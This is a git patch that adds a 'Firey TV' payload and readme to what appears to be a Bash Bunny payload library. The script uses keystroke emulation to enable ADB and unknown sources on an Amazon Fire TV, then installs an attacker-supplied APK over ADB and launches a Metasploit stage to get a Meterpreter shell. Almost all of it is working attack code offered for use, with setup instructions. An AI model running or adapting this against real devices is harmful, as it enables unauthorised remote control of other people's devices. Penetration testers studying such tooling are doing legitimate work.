From f94fcc1b66432868e831af2eb984d82d037740fc Mon Sep 17 00:00:00 2001 From: DemmSec Date: Fri, 7 Apr 2017 06:18:34 +0100 Subject: [PATCH] Added a Fireytv payload (#135) * Created payload to shell an amazon fire tv The payload performs keyboard emulation in order to enable ADB and unknown sources on the target FireTV. Once this is completed the payload then installs a payload.apk file via ADB and then runs it. * Created readme --- payloads/library/fireytv/payload.txt | 75 ++++++++++++++++++++++++++++ payloads/library/fireytv/readme.md | 28 +++++++++++ 2 files changed, 103 insertions(+) create mode 100644 payloads/library/fireytv/payload.txt create mode 100644 payloads/library/fireytv/readme.md diff --git a/payloads/library/fireytv/payload.txt b/payloads/library/fireytv/payload.txt new file mode 100644 index 00000000..fddf81f1 --- /dev/null +++ b/payloads/library/fireytv/payload.txt @@ -0,0 +1,75 @@ +# Title: Firey TV +# Author: DemmSec +# Version: 1.0 +# +# Enables ADB and unknown sources on a target FireTV +# Then pushes a payload APK via ADB +# +# Requires android-tools-adb installed on the Bash Bunny +# +# Purple ............Running HID emulation, enabling ADB and unknown sources +# Blue Blinking ...............Running ADB command to push payload.apk +# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny +# Green..............Finished +ATTACKMODE HID +LED R B 0 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q DOWNARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 500 +Q ENTER +Q DELAY 500 +Q DOWNARROW +Q DELAY 800 +Q ENTER +Q DELAY 800 +Q ENTER +Q DELAY 500 +Q DOWNARROW +Q DELAY 500 +Q DOWNARROW +Q DELAY 500 +Q ENTER +Q DELAY 200 +Q ENTER +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +ATTACKMODE ECM_ETHERNET +LED B 2000 +source bunny_helpers.sh +if [ -z "${TARGET_IP}" ]; then + LED R 2000 + exit 1 +fi +adb connect ${TARGET_IP} +adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk +adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" +LED G diff --git a/payloads/library/fireytv/readme.md b/payloads/library/fireytv/readme.md new file mode 100644 index 00000000..863bd529 --- /dev/null +++ b/payloads/library/fireytv/readme.md @@ -0,0 +1,28 @@ +# Meterpreter shell on an Amazon Fire TV + +* Author: DemmSec +* Version: Version 1.0 +* Target: Amazon FireTV (Latest Firmware/Version) + + +## Description + +Enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it. + +## Requirements + +Requires: android-tools-adb +To install this simply share your internet connection with the Bash Bunny. SSH into it and run: apt-get install android-tools-adb + +## Configuration + +Create a payload APK file and place it in the same directory as payload.txt, plug in and wait. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Purple | Running keyboard emulation | +| Blue Blinking | Running ADB to push payload to Fire TV | +| Red Blinking | Fire TV failed to get an IP address | +| Green | Finished |